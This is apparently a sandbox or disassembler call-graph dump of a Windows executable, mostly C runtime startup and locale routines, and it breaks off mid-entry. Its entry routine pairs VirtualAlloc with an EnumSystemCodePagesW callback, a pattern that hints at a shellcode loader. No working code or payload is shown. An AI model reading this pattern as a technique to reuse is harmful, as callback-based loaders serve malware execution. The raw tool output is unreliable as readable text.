@_EH4_CallFilterFunc@8 7572->7573 7574 d726a2 7572->7574 7575 d75770 __cftoe2_l 6 API calls 7574->7575 7575->7573 7352 d74bdf 7355 d74fc3 7352->7355 7354 d74bee 7356 d74fcf __wsopen_helper 7355->7356 7357 d736db __write_nolock 58 API calls 7356->7357 7358 d74fd7 7357->7358 7359 d74f1d _LocaleUpdate::_LocaleUpdate 58 API calls 7358->7359 7360 d74fe1 7359->7360 7380 d74cbe 7360->7380 7363 d748b1 __malloc_crt 58 API calls 7364 d75003 7363->7364 7365 d75130 __wsopen_helper 7364->7365 7387 d7516b 7364->7387 7365->7354 7368 d75140 7368->7365 7370 d75153 7368->7370 7372 d74831 _free 58 API calls 7368->7372 7369 d75039 7371 d75059 7369->7371 7374 d74831 _free 58 API calls 7369->7374 7373 d71cc3 __cftoe2_l 58 API calls 7370->7373 7371->7365 7375 d7442f __lock 58 API calls 7371->7375 7372->7370 7373->7365 7374->7371 7377 d75088 7375->7377 7376 d75116 7397 d75135 7376->7397 7377->7376 7379 d74831 _free 58 API calls 7377->7379 7379->7376 7381 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7380->7381 7382 d74cce 7381->7382 7383 d74cef 7382->7383 7384 d74cdd GetOEMCP 7382->7384 7385 d74cf4 GetACP 7383->7385 7386 d74d06 7383->7386 7384->7386 7385->7386 7386->7363 7386->7365 7388 d74cbe getSystemCP 60 API calls 7387->7388 7389 d75188 7388->7389 7392 d751d9 IsValidCodePage 7389->7392 7394 d7518f setSBCS 7389->7394 7395 d751fe _memset __setmbcp_nolock 7389->7395 7390 d75770 __cftoe2_l 6 API calls 7391 d7502a 7390->7391 7391->7368 7391->7369 7393 d751eb GetCPInfo 7392->7393 7392->7394 7393->7394 7393->7395 7394->7390 7400 d74d8b GetCPInfo 7395->7400 7466 d74599 LeaveCriticalSection 7397->7466 7399 d7513c 7399->7365 7401 d74dc3 7400->7401 7402 d74e6d 7400->7402 7410 d77a55 7401->7410 7404 d75770 __cftoe2_l 6 API calls 7402->7404 7406 d74f19 7404->7406 7406->7394 7409 d77917 ___crtLCMapStringA 62 API calls 7409->7402 7411 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7410->7411 7412 d77a66 7411->7412 7420 d7795d 7412->7420 7415 d77917 7416 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7415->7416 7417 d77928 7416->7417 7437 d77713 7417->7437 7421 d77977 7420->7421 7422 d77984 MultiByteToWideChar 7420->7422 7421->7422 7423 d779a9 7422->7423 7426 d779b0 7422->7426 7424 d75770 __cftoe2_l 6 API calls 7423->7424 7425 d74e24 7424->7425 7425->7415 7427 d7113f _malloc 58 API calls 7426->7427 7431 d779d2 _memset __crtLCMapStringA_stat 7426->7431 7427->7431 7428 d77a0e MultiByteToWideChar 7429 d77a38 7428->7429 7430 d77a28 GetStringTypeW 7428->7430 7433 d775c3 7429->7433 7430->7429 7431->7423 7431->7428 7434 d775de 7433->7434 7435 d775cd 7433->7435 7434->7423 7435->7434 7436 d74831 _free 58 API calls 7435->7436 7436->7434 7439 d7772c MultiByteToWideChar 7437->7439 7440 d7778b 7439->7440 7444 d77792 7439->7444 7441 d75770 __cftoe2_l 6 API calls 7440->7441 7442 d74e45 7441->7442 7442->7409 7443 d777f1 MultiByteToWideChar 7445 d77858 7443->7445 7446 d7780a 7443->7446 7447 d7113f _malloc 58 API calls 7444->7447 7450 d777ba __crtLCMapStringA_stat 7444->7450 7449 d775c3 __crtLCMapStringA_stat 58 API calls 7445->7449 7462 d77659 7446->7462 7447->7450 7449->7440 7450->7440 7450->7443 7451 d7781e 7451->7445 7452 d77834 7451->7452 7454 d77860 7451->7454 7452->7445 7453 d77659 ___crtLCMapStringW LCMapStringW 7452->7453 7453->7445 7457 d7113f _malloc 58 API calls 7454->7457 7460 d77888 __crtLCMapStringA_stat 7454->7460 7455 d77659 ___crtLCMapStringW LCMapStringW 7456 d778cb 7455->7456 7458 d778f3 7456->7458 7461 d778e5 WideCharToMultiByte 7456->7461 7457->7460 7459 d775c3 __crtLCMapStringA_stat 58 API calls 7458->7459 7459->7445 7460->7445 7460->7455 7461->7458 7463 d77684 ___crtLCMapStringW 7462->7463 7464 d77669 7462->7464 7465 d7769b LCMapStringW 7463->7465 7464->7451 7465->7451 7466->7399 7493 d733fc 7494 d73431 7493->7494 7495 d7340c 7493->7495 7495->7494 7500 d74961 7495->7500 7501 d7496d __wsopen_helper 7500->7501 7502 d736db __write_nolock 58 API calls 7501->7502 7503 d74972 7502->7503 7506 d77580 7503->7506 7517 d749b3 DecodePointer 7506->7517 7508 d77585 7512 d77590 7508->7512 7518 d749dc 7508->7518 7510 d775b8 7514 d7187c _abort 58 API calls 7510->7514 7511 d7759a IsProcessorFeaturePresent 7513 d775a5 7511->7513 7512->7510 7512->7511 7515 d71d2c __call_reportfault 7 API calls 7513->7515 7516 d775c2 7514->7516 7515->7510 7517->7508 7521 d749e8 __wsopen_helper 7518->7521 7519 d74a52 7520 d74a2f DecodePointer 7519->7520 7525 d74a61 7519->7525 7526 d74a1e _siglookup 7520->7526 7521->7519 7521->7520 7522 d74a19 7521->7522 7528 d74a15 7521->7528 7523 d736f3 __getptd_noexit 58 API calls 7522->7523 7523->7526 7527 d71cc3 __cftoe2_l 58 API calls 7525->7527 7529 d74abf 7526->7529 7531 d7187c _abort 58 API calls 7526->7531 7538 d74a27 __wsopen_helper 7526->7538 7530 d74a66 7527->7530 7528->7522 7528->7525 7533 d7442f __lock 58 API calls 7529->7533 7536 d74aca 7529->7536 7532 d71e89 __cftoe2_l 9 API calls 7530->7532 7531->7529 7532->7538 7533->7536 7534 d74b2c EncodePointer 7535 d74aff 7534->7535 7539 d74b5d 7535->7539 7536->7534 7536->7535 7538->7512 7540 d74b61 7539->7540 7541 d74b68 7539->7541 7543 d74599 LeaveCriticalSection 7540->7543 7541->7538 7543->7541 7544 d716e7 7545 d716f6 7544->7545 7546 d716fc 7544->7546 7547 d7187c _abort 58 API calls 7545->7547 7550 d717da 7546->7550 7547->7546 7549 d71701 __wsopen_helper 7551 d71932 _doexit 58 API calls 7550->7551 7552 d717e5 7551->7552 7552->7549 7761 d735a6 7762 d735b2 __wsopen_helper 7761->7762 7763 d736ba __wsopen_helper 7762->7763 7764 d74831 _free 58 API calls 7762->7764 7765 d735cb 7762->7765 7764->7765 7766 d735da 7765->7766 7767 d74831 _free 58 API calls 7765->7767 7768 d735e9 7766->7768 7769 d74831 _free 58 API calls 7766->7769 7767->7766 7770 d735f8 7768->7770 7771 d74831 _free 58 API calls 7768->7771 7769->7768 7772 d73607 7770->7772 7773 d74831 _free 58 API calls 7770->7773 7771->7770 7774 d73616 7772->7774 7775 d74831 _free 58 API calls 7772->7775 7773->7772 7776 d73625 7774->7776 7777 d74831 _free 58 API calls 7774->7777 7775->7774 7778 d73637 7776->7778 7779 d74831 _free 58 API calls 7776->7779 7777->7776 7780 d7442f __lock 58 API calls 7778->7780 7779->7778 7784 d7363f 7780->7784 7781 d73662 7793 d736c6 7781->7793 7784->7781 7786 d74831 _free 58 API calls 7784->7786 7785 d7442f __lock 58 API calls 7791 d73676 ___removelocaleref 7785->7791 7786->7781 7787 d736a7 7796 d736d2 7787->7796 7790 d74831 _free 58 API calls 7790->7763 7791->7787 7792 d7715c ___freetlocinfo 58 API calls 7791->7792 7792->7787 7799 d74599 LeaveCriticalSection 7793->7799 7795 d7366f 7795->7785 7800 d74599 LeaveCriticalSection 7796->7800 7798 d736b4 7798->7790 7799->7795 7800->7798 7586 d74985 7587 d74988 7586->7587 7588 d77580 _abort 62 API calls 7587->7588 7589 d74994 7588->7589 7801 d79624 7802 d7962c __cfltcvt_init 7801->7802 7803 d79637 7802->7803 7805 d7b3ca 7802->7805 7811 d7c2af 7805->7811 7807 d7b3dd 7808 d7b3e4 7807->7808 7809 d71e99 __invoke_watson 8 API calls 7807->7809 7808->7803 7810 d7b3f0 7809->7810 7813 d7c2cb __control87 7811->7813 7816 d7c2eb __control87 7811->7816 7812 d71cc3 __cftoe2_l 58 API calls 7814 d7c2e1 7812->7814 7813->7812 7815 d71e89 __cftoe2_l 9 API calls 7814->7815 7815->7816 7816->7807 7590 d73283 IsProcessorFeaturePresent 7591 d732a9 7590->7591 7592 d7b303 7595 d7b314 7592->7595 7594 d7b310 7596 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7595->7596 7597 d7b326 7596->7597 7604 d7b791 7597->7604 7599 d7b332 7600 d7b346 7599->7600 7609 d7b623 7599->7609 7602 d7b791 __forcdecpt_l 65 API calls 7600->7602 7603 d7b34f 7602->7603 7603->7594 7603->7603 7605 d7b7af 7604->7605 7606 d7b79d 7604->7606 7614 d7b64e 7605->7614 7606->7599 7610 d7b640 7609->7610 7611 d7b62f 7609->7611 7636 d7b5d1 7610->7636 7611->7599 7615 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7614->7615 7616 d7b661 7615->7616 7617 d7b6cd 7616->7617 7618 d7b66d 7616->7618 7619 d7b6eb 7617->7619 7633 d7917b 7617->7633 7625 d7b682 7618->7625 7626 d7c30c 7618->7626 7622 d71cc3 __cftoe2_l 58 API calls 7619->7622 7623 d7b6f1 7619->7623 7622->7623 7624 d77917 ___crtLCMapStringA 62 API calls 7623->7624 7624->7625 7625->7599 7627 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7626->7627 7628 d7c31e 7627->7628 7629 d7917b __isleadbyte_l 58 API calls 7628->7629 7632 d7c32b 7628->7632 7630 d7c34f 7629->7630 7631 d77a55 ___crtGetStringTypeA 61 API calls 7630->7631 7631->7632 7632->7625 7634 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7633->7634 7635 d7918c 7634->7635 7635->7619 7637 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7636->7637 7638 d7b5e2 7637->7638 7639 d7c30c __isctype_l 61 API calls 7638->7639 7640 d7b5f9 7638->7640 7639->7640 7640->7599 6097 d715c0 6098 d715cc __wsopen_helper 6097->6098 6134 d7407f GetStartupInfoW 6098->6134 6101 d715d1 6136 d71d17 GetProcessHeap 6101->6136 6102 d71629 6103 d71634 6102->6103 6216 d71710 6102->6216 6137 d73815 6103->6137 6106 d7163a 6107 d71645 __RTC_Initialize 6106->6107 6108 d71710 _fast_error_exit 58 API calls 6106->6108 6158 d738a8 6107->6158 6108->6107 6110 d71654 6111 d71660 GetCommandLineW 6110->6111 6112 d71710 _fast_error_exit 58 API calls 6110->6112 6177 d73fa4 GetEnvironmentStringsW 6111->6177 6115 d7165f 6112->6115 6115->6111 6117 d7167a 6118 d71685 6117->6118 6224 d717be 6117->6224 6187 d73d99 6118->6187 6121 d7168b 6122 d717be __lock 58 API calls 6121->6122 6124 d71696 6121->6124 6122->6124 6201 d717f8 6124->6201 6125 d7169e 6126 d716a9 __wwincmdln 6125->6126 6127 d717be __lock 58 API calls 6125->6127 6207 d71000 6126->6207 6127->6126 6130 d716cc 6234 d717e9 6130->6234 6133 d716d1 __wsopen_helper 6135 d74095 6134->6135 6135->6101 6136->6102 6237 d71890 RtlEncodePointer 6137->6237 6139 d7381a 6243 d74560 6139->6243 6142 d73823 6247 d7388b 6142->6247 6147 d73840 6259 d74869 6147->6259 6150 d73882 6152 d7388b __mtterm 61 API calls 6150->6152 6154 d73887 6152->6154 6153 d73861 6153->6150 6155 d73867 6153->6155 6154->6106 6268 d73762 6155->6268 6157 d7386f GetCurrentThreadId 6157->6106 6159 d738b4 __wsopen_helper 6158->6159 6160 d7442f __lock 58 API calls 6159->6160 6161 d738bb 6160->6161 6162 d74869 __calloc_crt 58 API calls 6161->6162 6164 d738cc 6162->6164 6163 d73937 GetStartupInfoW 6166 d73a7b 6163->6166 6168 d7394c 6163->6168 6164->6163 6165 d738d7 __wsopen_helper @_EH4_CallFilterFunc@8 6164->6165 6165->6110 6167 d73b43 6166->6167 6171 d73ac8 GetStdHandle 6166->6171 6173 d73adb GetFileType 6166->6173 6176 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6166->6176 6532 d73b53 6167->6532 6168->6166 6170 d74869 __calloc_crt 58 API calls 6168->6170 6172 d7399a 6168->6172 6170->6168 6171->6166 6172->6166 6174 d739ce GetFileType 6172->6174 6175 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6172->6175 6173->6166 6174->6172 6175->6172 6176->6166 6178 d73fb5 6177->6178 6179 d71670 6177->6179 6180 d748b1 __malloc_crt 58 API calls 6178->6180 6183 d73b5c GetModuleFileNameW 6179->6183 6182 d73fdb _memmove 6180->6182 6181 d73ff1 FreeEnvironmentStringsW 6181->6179 6182->6181 6184 d73b90 _wparse_cmdline 6183->6184 6185 d748b1 __malloc_crt 58 API calls 6184->6185 6186 d73bd0 _wparse_cmdline 6184->6186 6185->6186 6186->6117 6188 d73db2 __wsetenvp 6187->6188 6192 d73daa 6187->6192 6189 d74869 __calloc_crt 58 API calls 6188->6189 6197 d73ddb __wsetenvp 6189->6197 6190 d73e32 6191 d74831 _free 58 API calls 6190->6191 6191->6192 6192->6121 6193 d74869 __calloc_crt 58 API calls 6193->6197 6194 d73e57 6195 d74831 _free 58 API calls 6194->6195 6195->6192 6196 d75457 __wsetenvp 58 API calls 6196->6197 6197->6190 6197->6192 6197->6193 6197->6194 6197->6196 6198 d73e6e 6197->6198 6199 d71e99 __invoke_watson 8 API calls 6198->6199 6200 d73e7a 6199->6200 6200->6121 6202 d71804 __IsNonwritableInCurrentImage 6201->6202 6536 d74942 6202->6536 6204 d71822 __initterm_e 6206 d71841 __cinit __IsNonwritableInCurrentImage 6204->6206 6539 d7481c 6204->6539 6206->6125 6208 d7113f _malloc 58 API calls 6207->6208 6209 d71013 6208->6209 6605 d711d1 6209->6605 6213 d7104d _memset 6214 d7107c 6213->6214 6215 d71073 EnumSystemCodePagesW 6213->6215 6214->6130 6231 d71a61 6214->6231 6215->6214 6217 d71721 6216->6217 6218 d7171c 6216->6218 6220 d71ad2 __NMSG_WRITE 58 API calls 6217->6220 6219 d71a75 __FF_MSGBANNER 58 API calls 6218->6219 6219->6217 6221 d71729 6220->6221 6222 d717a8 __mtinitlocknum 3 API calls 6221->6222 6223 d71733 6222->6223 6223->6103 6225 d71a75 __FF_MSGBANNER 58 API calls 6224->6225 6226 d717c6 6225->6226 6227 d71ad2 __NMSG_WRITE 58 API calls 6226->6227 6228 d717ce 6227->6228 7312 d7187c 6228->7312 6232 d71932 _doexit 58 API calls 6231->6232 6233 d71a70 6232->6233 6233->6130 6235 d71932 _doexit 58 API calls 6234->6235 6236 d717f4 6235->6236 6236->6133 6278 d71767 6237->6278 6239 d718a1 __init_pointers __initp_misc_winsig 6279 d74995 EncodePointer 6239->6279 6241 d718b9 __init_pointers 6242 d74110 34 API calls 6241->6242 6242->6139 6244 d7456c 6243->6244 6246 d7381f 6244->6246 6280 d740a2 6244->6280 6246->6142 6256 d74001 6246->6256 6248 d73895 6247->6248 6253 d7389b 6247->6253 6283 d7401f 6248->6283 6250 d74479 DeleteCriticalSection 6286 d74831 6250->6286 6251 d74495 6254 d73828 6251->6254 6255 d744a1 DeleteCriticalSection 6251->6255 6253->6250 6253->6251 6254->6106 6255->6251 6257 d73835 6256->6257 6258 d74018 TlsAlloc 6256->6258 6257->6142 6257->6147 6260 d74870 6259->6260 6262 d7384d 6260->6262 6264 d7488e 6260->6264 6312 d774fd 6260->6312 6262->6150 6265 d7405d 6262->6265 6264->6260 6264->6262 6320 d743a9 Sleep 6264->6320 6266 d74077 TlsSetValue 6265->6266 6267 d74073 6265->6267 6266->6153 6267->6153 6269 d7376e __wsopen_helper 6268->6269 6323 d7442f 6269->6323 6271 d737ab 6330 d73803 6271->6330 6274 d7442f __lock 58 API calls 6275 d737cc ___addlocaleref 6274->6275 6333 d7380c 6275->6333 6277 d737f7 __wsopen_helper 6277->6157 6278->6239 6279->6241 6281 d740bf InitializeCriticalSectionAndSpinCount 6280->6281 6282 d740b2 6280->6282 6281->6244 6282->6244 6284 d74036 TlsFree 6283->6284 6285 d74032 6283->6285 6284->6253 6285->6253 6287 d74863 _free 6286->6287 6288 d7483a HeapFree 6286->6288 6287->6253 6288->6287 6289 d7484f 6288->6289 6292 d71cc3 6289->6292 6295 d736f3 GetLastError 6292->6295 6294 d71cc8 GetLastError 6294->6287 6309 d7403e 6295->6309 6297 d73708 6298 d73756 SetLastError 6297->6298 6299 d74869 __calloc_crt 55 API calls 6297->6299 6298->6294 6300 d7371b 6299->6300 6300->6298 6301 d7405d __getptd_noexit TlsSetValue 6300->6301 6302 d7372f 6301->6302 6303 d73735 6302->6303 6304 d7374d 6302->6304 6305 d73762 __initptd 55 API calls 6303->6305 6306 d74831 _free 55 API calls 6304->6306 6307 d7373d GetCurrentThreadId 6305->6307 6308 d73753 6306->6308 6307->6298 6308->6298 6310 d74055 TlsGetValue 6309->6310 6311 d74051 6309->6311 6310->6297 6311->6297 6313 d77508 6312->6313 6315 d77523 6312->6315 6314 d77514 6313->6314 6313->6315 6316 d71cc3 __cftoe2_l 57 API calls 6314->6316 6317 d77533 HeapAlloc 6315->6317 6318 d77519 6315->6318 6321 d71741 DecodePointer 6315->6321 6316->6318 6317->6315 6317->6318 6318->6260 6320->6264 6322 d71754 6321->6322 6322->6315 6324 d74453 EnterCriticalSection 6323->6324 6325 d74440 6323->6325 6324->6271 6336 d744b7 6325->6336 6327 d74446 6327->6324 6328 d717be __lock 57 API calls 6327->6328 6329 d74452 6328->6329 6329->6324 6530 d74599 LeaveCriticalSection 6330->6530 6332 d737c5 6332->6274 6531 d74599 LeaveCriticalSection 6333->6531 6335 d73813 6335->6277 6337 d744c3 __wsopen_helper 6336->6337 6338 d744e4 6337->6338 6339 d744cc 6337->6339 6347 d74505 __wsopen_helper 6338->6347 6402 d748b1 6338->6402 6360 d71a75 6339->6360 6345 d74500 6349 d71cc3 __cftoe2_l 58 API calls 6345->6349 6346 d7450f 6350 d7442f __lock 58 API calls 6346->6350 6347->6327 6349->6347 6352 d74516 6350->6352 6354 d74523 6352->6354 6355 d7453b 6352->6355 6356 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6354->6356 6357 d74831 _free 58 API calls 6355->6357 6358 d7452f 6356->6358 6357->6358 6408 d74557 6358->6408 6411 d73e88 6360->6411 6362 d71a7c 6363 d71a89 6362->6363 6364 d73e88 __NMSG_WRITE 58 API calls 6362->6364 6365 d71ad2 __NMSG_WRITE 58 API calls 6363->6365 6368 d71aab 6363->6368 6364->6363 6366 d71aa1 6365->6366 6367 d71ad2 __NMSG_WRITE 58 API calls 6366->6367 6367->6368 6369 d71ad2 6368->6369 6370 d71af0 __NMSG_WRITE 6369->6370 6371 d71c17 6370->6371 6372 d73e88 __NMSG_WRITE 55 API calls 6370->6372 6493 d75770 6371->6493 6374 d71b03 6372->6374 6376 d71c1c GetStdHandle 6374->6376 6377 d73e88 __NMSG_WRITE 55 API calls 6374->6377 6375 d71c80 6399 d717a8 6375->6399 6376->6371 6380 d71c2a _strlen 6376->6380 6378 d71b14 6377->6378 6378->6376 6379 d71b26 6378->6379 6379->6371 6441 d75457 6379->6441 6380->6371 6382 d71c63 WriteFile 6380->6382 6382->6371 6384 d71c84 6386 d71e99 __invoke_watson 8 API calls 6384->6386 6385 d71b53 GetModuleFileNameW 6387 d71b73 6385->6387 6391 d71b83 __wsetenvp 6385->6391 6389 d71c8e 6386->6389 6388 d75457 __wsetenvp 55 API calls 6387->6388 6388->6391 6390 d71bc9 6390->6384 6459 d753eb 6390->6459 6391->6384 6391->6390 6450 d754cc 6391->6450 6395 d753eb __NMSG_WRITE 55 API calls 6396 d71c00 6395->6396 6396->6384 6397 d71c07 6396->6397 6468 d7558a EncodePointer 6397->6468 6508 d71774 GetModuleHandleExW 6399->6508 6405 d748bf 6402->6405 6404 d744f9 6404->6345 6404->6346 6405->6404 6407 d748d2 6405->6407 6511 d7113f 6405->6511 6407->6404 6407->6405 6528 d743a9 Sleep 6407->6528 6529 d74599 LeaveCriticalSection 6408->6529 6410 d7455e 6410->6347 6412 d73e92 6411->6412 6413 d73e9c 6412->6413 6414 d71cc3 __cftoe2_l 58 API calls 6412->6414 6413->6362 6415 d73eb8 6414->6415 6418 d71e89 6415->6418 6421 d71e5e DecodePointer 6418->6421 6422 d71e71 6421->6422 6427 d71e99 IsProcessorFeaturePresent 6422->6427 6425 d71e5e __cftoe2_l 8 API calls 6426 d71e95 6425->6426 6426->6362 6428 d71ea4 6427->6428 6433 d71d2c 6428->6433 6432 d71e88 6432->6425 6434 d71d46 _memset __call_reportfault 6433->6434 6435 d71d66 IsDebuggerPresent 6434->6435 6436 d743cc __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6435->6436 6439 d71e2a __call_reportfault 6436->6439 6437 d75770 __cftoe2_l 6 API calls 6438 d71e4d 6437->6438 6440 d743b7 GetCurrentProcess TerminateProcess 6438->6440 6439->6437 6440->6432 6442 d75470 6441->6442 6443 d75462 6441->6443 6444 d71cc3 __cftoe2_l 58 API calls 6442->6444 6443->6442 6447 d75489 6443->6447 6445 d7547a 6444->6445 6446 d71e89 __cftoe2_l 9 API calls 6445->6446 6448 d71b46 6446->6448 6447->6448 6449 d71cc3 __cftoe2_l 58 API calls 6447->6449 6448->6384 6448->6385 6449->6445 6454 d754da 6450->6454 6451 d754de 6452 d754e3 6451->6452 6453 d71cc3 __cftoe2_l 58 API calls 6451->6453 6452->6390 6455 d7550e 6453->6455 6454->6451 6454->6452 6457 d7551d 6454->6457 6456 d71e89 __cftoe2_l 9 API calls 6455->6456 6456->6452 6457->6452 6458 d71cc3 __cftoe2_l 58 API calls 6457->6458 6458->6455 6460 d75405 6459->6460 6463 d753f7 6459->6463 6461 d71cc3 __cftoe2_l 58 API calls 6460->6461 6462 d7540f 6461->6462 6464 d71e89 __cftoe2_l 9 API calls 6462->6464 6463->6460 6466 d75431 6463->6466 6465 d71be9 6464->6465 6465->6384 6465->6395 6466->6465 6467 d71cc3 __cftoe2_l 58 API calls 6466->6467 6467->6462 6469 d755be ___crtIsPackagedApp 6468->6469 6470 d7567d IsDebuggerPresent 6469->6470 6471 d755cd LoadLibraryExW 6469->6471 6474 d75687 6470->6474 6475 d756a2 6470->6475 6472 d755e4 GetLastError 6471->6472 6473 d7560a GetProcAddress 6471->6473 6479 d755f3 LoadLibraryExW 6472->6479 6481 d7569a 6472->6481 6480 d7561e 7 API calls 6473->6480 6473->6481 6476 d75695 6474->6476 6477 d7568e OutputDebugStringW 6474->6477 6475->6476 6478 d756a7 DecodePointer 6475->6478 6476->6481 6487 d756ce DecodePointer DecodePointer 6476->6487 6491 d756e6 6476->6491 6477->6476 6478->6481 6479->6473 6479->6481 6482 d75666 GetProcAddress EncodePointer 6480->6482 6483 d7567a 6480->6483 6484 d75770 __cftoe2_l 6 API calls 6481->6484 6482->6483 6483->6470 6488 d7576c 6484->6488 6485 d7570a DecodePointer 6485->6481 6486 d7571e DecodePointer 6486->6485 6489 d75725 6486->6489 6487->6491 6488->6371 6489->6485 6492 d75736 DecodePointer 6489->6492 6491->6485 6491->6486 6492->6485 6494 d7577a IsProcessorFeaturePresent 6493->6494 6495 d75778 6493->6495 6497 d77ae6 6494->6497 6495->6375 6500 d77a95 IsDebuggerPresent 6497->6500 6501 d77aaa __call_reportfault 6500->6501 6506 d743cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6501->6506 6503 d77ab2 __call_reportfault 6507 d743b7 GetCurrentProcess TerminateProcess 6503->6507 6505 d77acf 6505->6375 6506->6503 6507->6505 6509 d7178d GetProcAddress 6508->6509 6510 d7179f ExitProcess 6508->6510 6509->6510 6512 d711ba 6511->6512 6520 d7114b 6511->6520 6513 d71741 _malloc DecodePointer 6512->6513 6514 d711c0 6513->6514 6516 d71cc3 __cftoe2_l 57 API calls 6514->6516 6515 d71a75 __FF_MSGBANNER 57 API calls 6525 d71156 6515->6525 6527 d711b2 6516->6527 6517 d7117e RtlAllocateHeap 6517->6520 6517->6527 6518 d71ad2 __NMSG_WRITE 57 API calls 6518->6525 6519 d711a6 6521 d71cc3 __cftoe2_l 57 API calls 6519->6521 6520->6517 6520->6519 6523 d71741 _malloc DecodePointer 6520->6523 6524 d711a4 6520->6524 6520->6525 6521->6524 6522 d717a8 __mtinitlocknum 3 API calls 6522->6525 6523->6520 6526 d71cc3 __cftoe2_l 57 API calls 6524->6526 6525->6515 6525->6518 6525->6520 6525->6522 6526->6527 6527->6405 6528->6407 6529->6410 6530->6332 6531->6335 6535 d74599 LeaveCriticalSection 6532->6535 6534 d73b5a 6534->6165 6535->6534 6537 d74945 EncodePointer 6536->6537 6537->6537 6538 d7495f 6537->6538 6538->6204 6542 d74720 6539->6542 6541 d74827 6541->6206 6543 d7472c __wsopen_helper 6542->6543 6550 d71920 6543->6550 6549 d74753 __wsopen_helper 6549->6541 6551 d7442f __lock 58 API calls 6550->6551 6552 d71927 6551->6552 6553 d74764 DecodePointer DecodePointer 6552->6553 6554 d74741 6553->6554 6555 d74791 6553->6555 6564 d7475e 6554->6564 6555->6554 6567 d77421 6555->6567 6557 d747f4 EncodePointer EncodePointer 6557->6554 6558 d747a3 6558->6557 6559 d747c8 6558->6559 6574 d748f8 6558->6574 6559->6554 6561 d748f8 __realloc_crt 61 API calls 6559->6561 6562 d747e2 EncodePointer 6559->6562 6563 d747dc 6561->6563 6562->6557 6563->6554 6563->6562 6601 d71929 6564->6601 6568 d7743f HeapSize 6567->6568 6569 d7742a 6567->6569 6568->6558 6570 d71cc3 __cftoe2_l 58 API calls 6569->6570 6571 d7742f 6570->6571 6572 d71e89 __cftoe2_l 9 API calls 6571->6572 6573 d7743a 6572->6573 6573->6558 6576 d748ff 6574->6576 6577 d7493c 6576->6577 6579 d77452 6576->6579 6600 d743a9 Sleep 6576->6600 6577->6559 6580 d77466 6579->6580 6581 d7745b 6579->6581 6583 d7746e 6580->6583 6588 d7747b 6580->6588 6582 d7113f _malloc 58 API calls 6581->6582 6584 d77463 6582->6584 6585 d74831 _free 58 API calls 6583->6585 6584->6576 6597 d77476 _free 6585->6597 6586 d774b3 6589 d71741 _malloc DecodePointer 6586->6589 6587 d77483 HeapReAlloc 6587->6588 6587->6597 6588->6586 6588->6587 6591 d774e3 6588->6591 6593 d71741 _malloc DecodePointer 6588->6593 6596 d774cb 6588->6596 6590 d774b9 6589->6590 6592 d71cc3 __cftoe2_l 58 API calls 6590->6592 6594 d71cc3 __cftoe2_l 58 API calls 6591->6594 6592->6597 6593->6588 6595 d774e8 GetLastError 6594->6595 6595->6597 6598 d71cc3 __cftoe2_l 58 API calls 6596->6598 6597->6576 6599 d774d0 GetLastError 6598->6599 6599->6597 6600->6576 6604 d74599 LeaveCriticalSection 6601->6604 6603 d71930 6603->6549 6604->6603 6611 d711e6 6605->6611 6607 d71025 VirtualAlloc 6608 d71475 6607->6608 7127 d71490 6608->7127 6610 d7148b 6610->6213 6614 d711f2 __wsopen_helper 6611->6614 6612 d71205 6613 d71cc3 __cftoe2_l 58 API calls 6612->6613 6615 d7120a 6613->6615 6614->6612 6616 d71236 6614->6616 6617 d71e89 __cftoe2_l 9 API calls 6615->6617 6630 d72034 6616->6630 6629 d71215 __wsopen_helper @_EH4_CallFilterFunc@8 6617->6629 6619 d7123b 6620 d71244 6619->6620 6621 d71251 6619->6621 6624 d71cc3 __cftoe2_l 58 API calls 6620->6624 6622 d7127b 6621->6622 6623 d7125b 6621->6623 6645 d72153 6622->6645 6625 d71cc3 __cftoe2_l 58 API calls 6623->6625 6624->6629 6625->6629 6629->6607 6631 d72040 __wsopen_helper 6630->6631 6632 d7442f __lock 58 API calls 6631->6632 6642 d7204e 6632->6642 6633 d720c2 6663 d7214a 6633->6663 6634 d720c9 6636 d748b1 __malloc_crt 58 API calls 6634->6636 6638 d720d0 6636->6638 6637 d7213f __wsopen_helper 6637->6619 6638->6633 6640 d740a2 __getstream InitializeCriticalSectionAndSpinCount 6638->6640 6643 d720f6 EnterCriticalSection 6640->6643 6641 d744b7 __mtinitlocknum 58 API calls 6641->6642 6642->6633 6642->6634 6642->6641 6666 d71f9d 6642->6666 6671 d72007 6642->6671 6643->6633 6653 d72173 __wopenfile 6645->6653 6646 d7218d 6647 d71cc3 __cftoe2_l 58 API calls 6646->6647 6648 d72192 6647->6648 6649 d71e89 __cftoe2_l 9 API calls 6648->6649 6651 d71286 6649->6651 6650 d723ab 6678 d7625f 6650->6678 6660 d712a8 6651->6660 6653->6646 6659 d72348 6653->6659 6681 d762b3 6653->6681 6656 d762b3 __wcsnicmp 60 API calls 6657 d72360 6656->6657 6658 d762b3 __wcsnicmp 60 API calls 6657->6658 6657->6659 6658->6659 6659->6646 6659->6650 7120 d71fcd 6660->7120 6662 d712ae 6662->6629 6676 d74599 LeaveCriticalSection 6663->6676 6665 d72151 6665->6637 6667 d71fbe EnterCriticalSection 6666->6667 6668 d71fa8 6666->6668 6667->6642 6669 d7442f __lock 58 API calls 6668->6669 6670 d71fb1 6669->6670 6670->6642 6672 d72015 6671->6672 6673 d72028 LeaveCriticalSection 6671->6673 6677 d74599 LeaveCriticalSection 6672->6677 6673->6642 6675 d72025 6675->6642 6676->6665 6677->6675 6689 d75a43 6678->6689 6680 d76278 6680->6651 6682 d762c5 6681->6682 6683 d76351 6681->6683 6685 d71cc3 __cftoe2_l 58 API calls 6682->6685 6688 d72341 6682->6688 7032 d76369 6683->7032 6686 d762de 6685->6686 6687 d71e89 __cftoe2_l 9 API calls 6686->6687 6687->6688 6688->6656 6688->6659 6692 d75a4f __wsopen_helper 6689->6692 6690 d75a65 6691 d71cc3 __cftoe2_l 58 API calls 6690->6691 6693 d75a6a 6691->6693 6692->6690 6694 d75a9b 6692->6694 6695 d71e89 